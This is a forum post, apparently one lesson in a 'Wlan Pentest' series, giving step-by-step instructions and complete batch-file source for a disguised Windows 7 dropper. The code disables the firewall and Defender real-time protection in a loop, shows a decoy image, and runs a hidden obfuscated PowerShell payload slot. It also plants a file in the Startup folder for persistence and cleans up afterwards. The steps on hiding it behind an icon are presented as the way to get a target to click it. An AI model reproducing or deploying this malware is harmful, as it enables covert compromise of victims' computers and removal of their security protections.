Learn About Computers

Teaching about Computers


    28. Wlan Pentest Create Icon Preparing Payload Windows 7

    Share

    Aof
    Admin

    Posts : 77
    Join date : 2018-03-24

    28. Wlan Pentest Create Icon Preparing Payload Windows 7

    Post by Aof on Wed May 30, 2018 2:59 am


    28. Wlan Pentest Create Icon Preparing Payload Windows 7
    ----
    Payload Concealment
    1. Create icon with Big J's Icon Maker, you could use any Icon Maker for this.
    2. Edit the F1 file first putting the Payload in the "INSERT-HERE" from the original payload file or the fi file we edited earlier, inside of the
    ('INSERT-HERE') enclosed punctuations. Under the A: Block of text.
    3. create a new folder around the bat files named "e" to put our exe files that we create using BattoExe program that we learned about in our previous Lan Pentesting Videos.
    4. choose f.bat to convert into an invisible 64 bit exe first make sure %appdata% is set as working directory.
    5. then choose f1.bat to convert to invisible 64 bit exe, make sure %appdata% is set for working directory, and overwrite is set, and extract embeded items to %appdata% as well, include the f.exe file that we just created.
    6. then choose af.bat to convert to invisible 64 bit exe, make sure %appdata% is set for working directory, choose icon for the file, choose %appdata% for embeded items, and make sure overwrite is set to yes. We will choose to embed, "zombie.PNG" and "f1.exe" (f1.exe also has f.exe embeded within it which we did previously.) so there is no need to include the f.exe
    7. The payload here is created for a Windows 7 Pc, if it were to be created for a Windows 10 Pc, we would require administrative priveledges as we did with the Lan Pentesting video earlier, so that it could disable W10 Protection.
    8. the "File.exe" is what the Target Pc will click to initiate the connection between the user and the Linux user.
    9. Once it's double-clicked, it will open the zombie.PNG image for the user, and run the f1.exe file in the background.
    10. the f.exe file will remain silent until the user restarts their pc, then it will remove f1.exe from the target's %appdata% folder.
    The video has been sped up at this point, at this point in the video, it navigates to the folder where the files were extracted to show you how everything works.

    Contents of fi.bat file
    =*=
    Code:
    @echo off & powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
    exit

    af.bat file contents This file will be the first & main file, that will eventually contain all of the other exe files that we create using bat to exe, it will also be in charge of disabling protection, or bypassing it in Windows 7 64-bit systems, this will not work for 32-bit windows 7 systems.
    =*=
    Code:
    @echo off
    if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
    taskkill /im f1.exe /f
    timeout /t 01 > nul
    start "" "%appdata%\zombie.png"
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    "%appdata%\f1.exe" 2> nul
    exit

    f1.bat file contents This Bat file is the one that should actually contain your Payload, in the 'INSERT-HERE' section under the A: BLOCK of text.
    =*=
    Code:
    @echo off
    taskkill /im powershell.exe /f 2> nul
    timeout /t 02
    move "%appdata%\f.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe"
    :Begin
    set t=%date:~4,5%
    if "%t%"=="03/02" goto :A
    if not "%t%"=="03/02" goto :B
    timeout /t 02 > nul
    :A
    powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
    exit
    :B
    timeout /t 05
    start "" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe" 2> nul
    timeout /t 05

    f.bat file contents This bat file tells windows to remove the f1.exe file whenever the user restarts the computer.
    =*=
    Code:
    @echo off
    taskkill /im f1.exe /f 2> nul
    taskkill /im powershell.exe /f
    timeout /t 04 > nul
    del "%appdata%\f1.exe" /q /s /f 2> nul




    Aof
    Admin

    Posts : 77
    Join date : 2018-03-24

    Re: 28. Wlan Pentest Create Icon Preparing Payload Windows 7

    Post by Aof on Wed May 30, 2018 3:31 am

    http://www.majorgeeks.com/files/details/bat_to_exe_converter.html
    Bat to Exe Converter Download Link

    mediafire.com/file/lljfw7si9crtwrb/bjim.zip
    Note: Any Icon Maker can be used, you don't have to use a specific one.
    Big J Icon Maker Download Link copy & Paste in your browser above Also it should be noted that any Icon Maker should work, you don't have to use this one.

      Current date/time is Fri Oct 19, 2018 11:47 pm